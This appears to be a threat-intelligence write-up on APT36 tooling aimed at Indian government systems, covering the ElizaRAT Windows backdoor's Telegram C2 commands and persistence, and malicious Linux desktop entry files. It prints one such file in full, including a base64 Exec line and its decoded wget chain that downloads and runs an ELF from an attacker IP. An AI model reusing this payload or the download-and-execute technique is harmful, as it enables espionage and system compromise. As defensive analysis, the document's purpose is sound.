Introduction
In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetuated by the Pakistan-based advanced persistent threat group (APT36). APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector used against the Linux environment.
In this blog, we will examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems.
Key Takeaways
Brief Overview
Analysis of ElizaRAT, the New Windows RAT
Malicious Linux Desktop Entry Files as New Attack Vectors
New Python-Based Cyber Espionage Utilities Targeting Linux
Threat Attribution
Threat Actor Infrastructure
Conclusion
Zscaler Coverage
MITRE ATT&CK TTP Mapping
Indicators of Compromise (IOCs)
Key Takeaways
Updated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors.
New Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint.
Abuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain.
New attack vectors for Linux: APT36 now boasts innovative weaponization of Linux desktop configuration files that target Linux-based endpoints in the Indian government sector.
Deceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India.
Reuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries.
Brief Overview
APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors.
This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes:
Custom-built remote administration tools targeting Windows
Lightweight Python-compiled cyber espionage tools serving specific purpose targeting Windows and Linux
Weaponized open-source C2 frameworks like Mythic
Trojanized installers of Indian government applications like KAVACH multi-factor authentication
Trojanized Android apps
Credential phishing sites targeting Indian government officials
Analysis of ElizaRAT, the New Windows RAT
We assigned the moniker “ElizaRAT” to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel.
ElizaRAT is distributed as .NET binaries sent inside password-protected archive files hosted on Google Drive links. During our threat analysis, we gathered several samples of ElizaRAT and they all shared these characteristics:
They are all .NET binaries that are compiled as Control Panel applets (CPL) and use the “.cpl” file extension. To the best of our knowledge, we believe this is the first time APT36 has weaponized the CPL file format.
The binaries are large in size – ranging from 4MB to 16MB.
The Costura .NET framework was used to embed the essential .NET assemblies inside the main malware which resulted in the inflation of binary sizes.
The Telegram API was used for C2 communication.
For this technical analysis, we use the following file metadata:
MD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0
Filename: AgendaMeeting.cpl
Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet().
This method transfers control to Program().Main() which in turn invokes an asynchronous task – MainAsync(). Inside this task, all important malicious operations are carried out.
The image below shows Program().Main() kick starting the malicious activities on the endpoint.
Figure 1: The MainAsync() method used to start the malicious activities on the endpoint.
Some of the key operations performed by ElizaRAT are:
Initializes the Telegram bot with Communicate.ConnectMe() using the built-in Telegram bot token and sets it up in polling mode to receive commands from the threat actor.
Creates a directory: %appdata%TextSource
Generates a UUID and username specific to the infected machine.
Drops and displays a decoy PDF file to the user.
Sets up persistence on the machine.
Fetches details on antivirus softwares running on the machine and sends the information to the attacker-controlled Telegram bot.
In the following sections, we dive deeper into some of these operations.
Logging Operation
Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side).
The code below shows that logging is done at the local and remote level.
// remote logging in Telegram bo
await Communication.send_message(“Username Created with name : “
+ TextSource.Settings._username);
// local logging on the infected endpoint
File.AppendAllText(TextSource.Settings.log_p, “username created
localn”);
Unique Identifier Generation
A UUID and username are generated for each infected machine so that the threat actor can uniquely identify the victim. It uses Windows Management Instrumentation (WMI) to fetch the processorID and UUID of the machine, and uses both these details to generate a UUID and username specific to the infected machine
The only difference between the generated UUID and the username is the “.cookie” extension. The username is the UUID without the “.cookie” extension.
The image below shows the relevant code used to generate these values.
Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine.
C2 Command Format
Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint.
The C2 command format looks like this:
<command>*<username>*<arguments>
C2 Commands
All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before the execution of any command, the RAT extracts the username from the C2 command and compares it with the infected machine’s username. The command is executed successfully only if both the values match.
The following C2 commands are supported by the bot:
Table 1: C2 commands supported by Telegram bot
C2 COMMAND
FUNCTIONALITY
/dir
Fetches the list of files in the specified directory.
/upload
Uploads the specified file from the victim’s machine.
/getprocess
Gets the list of processes running on the victim’s machine. The list is returned in a file with the name getproc.dll .
/run
Executes the specified program on the victim’s machine.
/delete
Deletes the specified file.
/end
Kills the specified processes on the victim’s machine.
/online
Checks whether the infected machine is online.
/identity
Connects to the specified website from the victim’s machine and sends a response to the threat actor. This can be used to fetch the machine’s IP address by supplying a parameter like hxxps://api.ipify[.]org .
/ping
Checks internet connectivity from the victim’s machine to the specified website.
/scr
Takes a screenshot of the victim’s machine and sends it to the threat actor in a file named scr.dll .
/createdir
Creates a directory on the user’s machine.
Persistence
In order to achieve persistence on the infected machine, the bot creates a Windows shortcut file (LNK) in the Windows Startup directory.
The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the “orig_name” setting defined in the config. In this case, the shortcut file is called TextSource.lnk.
Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence.
The description of this shortcut file is set to “Text Editing APP for Windows” to disguise it as a text editing application, making it seem innocuous. In addition, the target command line is set to execute the Control panel applet using rundll32 .
Displaying Decoy Content
The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary.
The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file.
Figure 4: Decoy PDF file displayed to the user.
Malicious Linux Desktop Entry Files as New Attack Vectors
The utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has discovered three samples – all of which have 0 detection on VirusTotal.
We first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.
National Informatics Center (NIC), India Phishing Attack – May 2023
In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel.
We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip URL.
From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.
Here are some technical details about this case:
ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
ZIP filename: Delegation_Saudi_Arabia.zip
Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
Desktop entry filename: Delegation_Saudi_Arabia.desktop
Desktop entry file analysis
We found the following content in the desktop entry file:
[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c “echo ‘L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R
yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g
L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2
h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It
bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1
LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn
BkZiB8IC4vMTg1LmVsZg==’ sh”
Terminal=false
Type=Application
Icon=x-office-document
The icon of this desktop entry file is set to “x-office-document” to seem like an innocent Office document.
The base64-encoded command present inside the desktop entry file decodes to:
/usr/bin/wget ‘hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf’ -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget ‘hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185’ -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf
